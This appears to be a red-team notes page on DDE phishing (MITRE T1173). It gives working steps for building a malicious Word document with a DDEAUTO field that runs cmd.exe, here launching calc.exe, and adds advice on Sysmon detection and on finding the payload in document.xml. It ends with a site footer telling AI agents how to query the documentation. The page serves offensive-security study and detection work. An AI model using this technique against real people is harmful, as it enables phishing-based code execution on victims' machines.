# T1173: Phishing - DDE
## Weaponization
Open a new MS Word Document and insert a field:
It will add an `!Unexpected End of Formula`to the document, that is expected. Right click it > Toggle Field Codes:
Toggle Field Codes will give this:
Replace `= \* MERGEFORMAT` with payload and save the doc:
```bash
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
```
to get this:
{% file src="/files/-LHOS0FpbTiWcXoHFoN9" %}
DDE: evil.docx
{% endfile %}
## Execution
Once the victim launches the evil .docx by and accepts 2 prompts, the reverse shell (or in this case a calc.exe) pops:
## Observations
Sysmon logs can help spot suspicious processes and/or network connections being initiated by Office applications:
## Inspection
How can we inspect .docx (same for .xlsx) files? Since they are essentially .zip archives, we can rename the .docx file to .zip and simply unzip the archive for further inspection.
The file we are interested in is the `document.xml` (trimmed for brevity below). Note how line 4 allows us inspecting the DDE payload in plain text:
{% code title="document.xml" %}
```markup
<...snip...>
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
<...snip...>
```
{% endcode %}
## References
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/t1173-dde.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.